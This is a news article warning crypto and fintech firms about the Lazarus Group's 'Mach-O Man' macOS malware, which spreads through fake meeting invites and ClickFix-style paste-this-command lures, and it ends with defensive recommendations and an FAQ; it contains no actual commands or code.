North Korea’s Lazarus Group has deployed a new macOS malware campaign called “Mach-O Man” that turns ordinary business meeting invites into direct pipelines for credential theft and corporate espionage, according to a warning from CertiK published April 22.
How the Attack Works
The campaign targets fintech and cryptocurrency executives through a social engineering technique called “ClickFix.” Victims receive an apparently urgent meeting invite over Telegram for a Zoom, Microsoft Teams, or Google Meet call. The link leads to a convincing fake website that tells them to copy and paste a command into their Mac’s terminal to fix a “connection issue.”
That single terminal command is all it takes. The malware gains access to corporate systems, SaaS platforms, and financial resources almost instantly.
“It is a modular macOS malware kit created by Lazarus Group’s infamous Chollima division. It uses native Mach-O binaries built for for Apple environments where crypto and fintech operate,” said Natalie Newson, a senior blockchain security researcher at CertiK, in an interview with CoinDesk.
Mach-O binaries are the native executable format for macOS. By using Apple’s own file structure, the malware bypasses many traditional antivirus scanners that are better at detecting Windows-based threats.
A Month of Devastation
The timing of Mach-O Man’s emergence is chilling. Over the past two weeks alone, Lazarus Group has been linked to more than $500 million in losses from the Drift Protocol ($285 million) and KelpDAO ($292 million) exploits. When combined with the new malware campaign, the collective picture is one of a state-backed hacking operation running at peak capacity.
“What makes Lazarus especially dangerous right now is their activity level,” Newson said. “KelpDAO, Drift, and now a new macOS malware kit, all within the same month. This isn’t random hacking; it’s a state-directed financial operation running at a scale and speed typical of institutions.”
According to blockchain analytics firm Chainalysis, Lazarus Group’s cumulative crypto theft since 2017 is estimated at $6.7 billion.
Fake Cloudflare Pages Add Another Attack Vector
Security researcher Vladimir S. identified on X several variations of the Mach-O Man attack. In some cases, Lazarus operatives have hijacked DeFi project domains, replacing legitimate websites with fake Cloudflare verification pages that prompt visitors to enter a terminal command for “verification.”
“These fake verification steps guide victims through keyboard shortcuts that run a harmful command,” Newson explained. “The page looks real, the instructions seem normal, and the victim initiates the action themselves – which is why traditional security controls often miss it.”
Mauro Eldritch, security expert and founder of threat intelligence firm BCA Ltd, described the ClickFix delivery method in technical detail, noting that the campaign is designed to leave minimal forensic traces. The malware erases itself after execution.
Why Most Victims Won’t Know They’ve Been Hit
Unlike ransomware attacks that announce themselves, Mach-O Man operates silently. By the time a firm discovers the breach, the malware has already exfiltrated credentials and keychain data and then deleted its own traces.
“They likely don’t know it yet,” Newson said of current victims. “If they do, they probably can’t identify which variant affected them.”
The implications extend beyond individual losses. If the malware harvests private keys or multisig credentials from DeFi project maintainers, it could lead to the kind of protocol-level exploits that have defined April 2026.
How Crypto Firms Can Protect Themselves
CertiK and other security researchers recommend the following measures:
- Never paste terminal commands from external sources. No legitimate video conferencing platform requires manual terminal fixes.
- Verify meeting invites through official channels. If someone contacts you via Telegram about an urgent call, confirm through a separate communication channel.
- Deploy Endpoint Detection and Response (EDR) tools that monitor for suspicious Mach-O binary execution and keychain access.
- Use hardware wallets and air-gapped signing for treasury operations. Compromised macOS credentials should never provide direct access to protocol funds.
- Treat Lazarus as a persistent nation-state threat, not an occasional attacker. “The crypto industry needs to start viewing Lazarus the same way banks view nation-state cyber actors,” Newson warned.
FAQ
What’s the Mach-O Man malware?
Mach-O Man is a modular macOS malware kit developed by North Korea’s Lazarus Group. It uses native Apple binary formats and social engineering (fake meeting invites) to trick crypto and fintech executives into running malicious terminal commands that steal credentials and corporate data.
How much has Lazarus Group stolen from crypto?
Since 2017, Lazarus Group has accumulated an estimated $6.7 billion in crypto theft, according to Chainalysis. In April 2026 alone, they’re linked to over $500 million in losses from the Drift Protocol and KelpDAO exploits.
How can crypto firms defend against Mach-O Man?
Never execute terminal commands from untrusted meeting links, verify all meeting invites through official channels, deploy macOS-specific endpoint detection tools, and use hardware wallets for all treasury operations. The malware self-destructs after execution, making prevention the only reliable defence.
